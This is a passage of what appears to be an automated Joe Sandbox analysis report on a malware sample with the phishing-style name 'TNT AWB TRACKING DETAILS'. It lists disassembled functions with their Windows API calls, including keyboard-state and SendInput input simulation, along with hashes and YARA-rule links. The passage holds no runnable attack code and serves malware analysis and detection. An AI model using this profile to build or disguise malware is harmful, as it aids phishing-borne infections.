                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                      • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                      • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                      • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                      Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004302E6
                                      • GetWindowRect.USER32(00000000,?), ref: 00430316
                                      • GetClientRect.USER32(?,?), ref: 00430364
                                      • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                      • GetWindowRect.USER32(?,?), ref: 004303C3
                                      • ScreenToClient.USER32(?,?), ref: 004303EC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                      • String ID:
                                      • API String ID: 3220332590-0
                                      • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                      • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                      • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                      • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                      Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _malloc_wcslen$_strcat_wcscpy
                                      • String ID:
                                      • API String ID: 1612042205-0
                                      • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                      • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                      • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                      • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                      Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove_strncmp
                                      • String ID: >$U$\
                                      • API String ID: 2666721431-237099441
                                      • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                      • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                      • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                      • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                      Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044C570
                                      • SetKeyboardState.USER32(00000080), ref: 0044C594
                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$InputSend
                                      • String ID:
                                      • API String ID: 2221674350-0
                                      • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                      • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                      • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                      • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                      Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcscpy$_wcscat
                                      • String ID:
                                      • API String ID: 2037614760-0
                                      • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                      • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                      • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                      • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                      Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                      • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                      • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                      • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                      • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                      • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$AllocClearErrorLastString
                                      • String ID:
                                      • API String ID: 960795272-0
                                      • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                      • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                      • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                      • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                      Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                      • EndPaint.USER32(?,?), ref: 00447D13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                      • String ID:
                                      • API String ID: 4189319755-0
                                      • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                      • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                      • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                      • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                      Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                      • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                      • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                      • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow$InvalidateRect
                                      • String ID:
                                      • API String ID: 1976402638-0
                                      • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                      • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                      • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                      • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                      Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                      • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                      • ShowWindow.USER32(?,00000000), ref: 00440B18
                                      • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                      • EnableWindow.USER32(?,00000001), ref: 00440B50
                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                      • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                      • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                      • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                      Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Enable$Show$MessageSend
                                      • String ID:
                                      • API String ID: 1871949834-0
                                      • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                      • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                      • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                      • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                      Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                      • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                      • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                      • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                      Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                      • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                      • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                      • SendMessageW.USER32 ref: 00471AE3
                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                      • String ID:
                                      • API String ID: 3611059338-0
                                      • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                      • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                      • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                      • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                      Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DestroyWindow$DeleteObject$IconMove
                                      • String ID:
                                      • API String ID: 1640429340-0
                                      • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                      • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                      • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                      • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                      Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • _wcslen.LIBCMT ref: 004438CD
                                      • _wcslen.LIBCMT ref: 004438E6
                                      • _wcstok.LIBCMT ref: 004438F8
                                      • _wcslen.LIBCMT ref: 0044390C
                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                      • _wcstok.LIBCMT ref: 00443931
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                      • String ID:
                                      • API String ID: 3632110297-0
                                      • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                      • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                      • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                      • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                      Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
